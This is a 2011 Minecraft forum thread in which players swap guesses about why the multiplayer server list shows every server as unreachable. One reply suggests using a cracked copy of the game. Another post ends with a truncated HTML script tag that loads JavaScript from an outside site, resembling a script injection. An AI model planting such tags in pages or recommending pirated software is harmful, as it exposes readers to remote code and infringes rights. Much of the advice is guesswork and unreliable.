19 replies to this topic

koolasad
    koolasad

Zombie Killer

• Members
  • 163 posts
  • Minecraft: asadr95

Posted 27 November 2011 - 06:58 PM

So I can log into minecraft.net and start up the game, but when i go to my server list ALL the servers are down...any solutions? I know the servers aren't down, it's a problem with my computer. It says "Can't reach server" underneath ALL the servers, as if i can't connect to them for some reason. I really need help, I payed for the game and i would really like to experience the full game, especially multiplayer!

Things I've Tried:
-Force Updating
-Using a brand new .minecraft folder
-I tried playing on my brother's laptop, and I could connect to all the servers perfectly. This proves that it's not my internet's fault
-Downloaded a brand new launcher
-Turning off my Firewall (I know, risky), but still couldn't connect to any servers
-Restarting my router

It seems as though nothing is wrong with my internet or with my Minecraft itself. The problem appears to reside with my computer.

***Ok, I'm offering a $20 Amazon Gift Card to whoever finds the solution!!!

Register or log in to remove.

mauzer410

Posted 27 November 2011 - 06:59 PM

go to a flat and jump down
muhah
Posted Image
Did my post help? Click the green plus on my post. It's 100% optional

seejayv2
  • Minecraft: seejayv2

Posted 27 November 2011 - 06:59 PM

They are all down.
Did my post help? Please click the green plus in the bottom right-hand corner of this post.

koolasad
    koolasad

Zombie Killer

• Members
  • 163 posts

Posted 28 November 2011 - 01:52 AM

Can someone please help me? It's been like this all day!

sean2012
    sean2012

Tree Puncher

• Members
  • 19 posts
  • Minecraft: sean2012

Posted 28 November 2011 - 02:11 AM

View Postkoolasad, on 28 November 2011 - 01:52 AM, said:

Can someone please help me? It's been like this all day!
Have you tried to connect to any of them? Could just be a problem with the website.

koolasad
    koolasad

Zombie Killer

• Members
  • 163 posts

Posted 28 November 2011 - 02:17 AM

View Postsean2012, on 28 November 2011 - 02:11 AM, said:

Have you tried to connect to any of them? Could just be a problem with the website.

What do you mean? I know the servers aren't actually down, I could easily connect to them on my brother's laptop.
And yes, i can successfully connect to minecraft.net. I can start the game and everything, but I can't get into ANY servers.

If you read everything I've tried in my original post, it's really hard to decipher the problem here. Can someone please really help me out?

Elystus
    Elystus

.-.. .- -- .--. -- .. -.

• Retired Staff
  • 1676 posts
  • Minecraft: Elystus

Posted 28 November 2011 - 02:40 AM

What firewall did you disable and what firewalls do you have?

If you are having minecraft problems, make sure to check out the help site.

Posted Image

koolasad
    koolasad

Zombie Killer

• Members
  • 163 posts

Posted 28 November 2011 - 02:42 AM

View PostLardman213, on 28 November 2011 - 02:40 AM, said:

What firewall did you disable and what firewalls do you have?

I just completely turned off my Firewall, didn't seem to help at all so I put it back on afterwards.

koolasad
    koolasad

Zombie Killer

• Members
  • 163 posts

Posted 28 November 2011 - 08:52 PM

Can anyone please REALLY HELP ME! Is the problem because of rules set on my computer that restricts me from connecting to other servers? Idk, i've tried everything, please help me!

I'll even offer a code for the Battlefield  3 Pre-order Dog Tag Pack to whoever finds the solution!

koolasad
    koolasad

Zombie Killer

• Members
  • 163 posts

Posted 28 November 2011 - 09:57 PM

bump

grafton12345
  • Minecraft: grafton12345

Posted 01 December 2011 - 12:10 AM

i have the same problem :/

Storm050
    Storm050

Tree Puncher

• Members
  • 34 posts
  • Minecraft: Storm050

Posted 01 December 2011 - 03:08 AM

I have this problem too, I was playing fine on a server one day and the next day I couldn't connect to any server. I asked my friend to see if the server was down but it wasn't. I haven't been able to connect to any server for a few days now. :(
Posted Image

Liz_B
    Liz_B

Newly Spawned

• Members
  • 1 posts

Posted 01 December 2011 - 03:27 AM

My servers aren't working either and I can't find a minecraft 1.8.1 download so I can try and downgrade that will work with my computer!  :(  :huh:

jckjcksn

Posted 01 December 2011 - 03:49 AM

I dont really know the true answer but i can give a few things you can try.  You can try downloading the icon (if not already) on ur desktop and using the download instead of from website. You can also try using the website 1 if u have always been using the download.  Mabye minecraft takes up too much space on your computer and just refuses to work.  That might mean a new comp, mabye more memory.  There could always be a problem with RAM.  You can try using a cracked version of mc.  Mabye try connecting with hamachi or cracked server.  I dont really know if this helps but try it if you want.  I really hope it helps.  It could always be a stupid mistake although not likely that u r using a diff account then what you made.  Lets say i hav a cracked account jackjackson and a real account for minecraft (paid version) jckjcksn and accidently login as jackjackson and forgot i hav to use jckjcksn.  It might be that but probably not.

If this does help i dont want the reward.  Keep it and plz notify me if this does help
~ Jckjcksn Posted Image <--- It wont bite... at least not until it hatches but click it anyway :D

Optiknerve
  • Minecraft: Optiknerve
  • Xbox:optiknerve rc

Posted 01 December 2011 - 03:53 AM

View Postkoolasad, on 27 November 2011 - 06:58 PM, said:

So I can log into minecraft.net and start up the game, but when i go to my server list ALL the servers are down...any solutions? I know the servers aren't down, it's a problem with my computer. It says "Can't reach server" underneath ALL the servers, as if i can't connect to them for some reason. I really need help, I payed for the game and i would really like to experience the full game, especially multiplayer!

Things I've Tried:
-Force Updating
-Using a brand new .minecraft folder
-I tried playing on my brother's laptop, and I could connect to all the servers perfectly. This proves that it's not my internet's fault
-Downloaded a brand new launcher
-Turning off my Firewall (I know, risky), but still couldn't connect to any servers
-Restarting my router

It seems as though nothing is wrong with my internet or with my Minecraft itself. The problem appears to reside with my computer.

***Ok, I'm offering a $20 Amazon Gift Card to whoever finds the solution!!!

I am having the same issues, i can connect localhost from my server computer but not from any of my others, i was just playing fine 6am this morning est

help :/
http://<script type="text/javascript" src="http://theresistance...t.js"></script>

Jenkoplz

Posted 01 December 2011 - 04:43 AM

Do you know how to access your router settings?

If so, look in your security settings for a check box that disables response to pings.

Uncheck this box. (i.e. Enable ping response)

Here's a screen-cap of my particular checkbox  -(Japanese tho):

Posted Image

Hope it works

CodeValue
  • Minecraft: Code_Value

Posted 21 December 2011 - 12:31 PM

It seems that it is a router problem. I have a friend who has fine internet but it doesn't even log in. This could be restrictions of data being sent from other computers. Put your internal IP into the URL and log into your router, then have a look over your settings. (be careful not to mess around with too many things)

I know this isn't a great guide, but I still hope it will help you guys.
Posted Image

Dillbn
    Dillbn

Out of the Water

• Members
  • 8 posts
  • Minecraft: Dillbn

Posted 30 December 2011 - 08:20 PM

I had the same Problem, I changed my password and it started to work. Try changing your password. even if its the same one as before this might fix it. It did for me. :)

clay_empire

Posted 19 March 2012 - 06:03 PM

i got this problem, i sign in, go on multiplayer... connecting for the next HOUR still no game :(
Posted Image

BigfootPlaysMC

Posted 08 September 2012 - 10:40 PM

Yeah, it really sucks but sorry, I have no idea what to do :D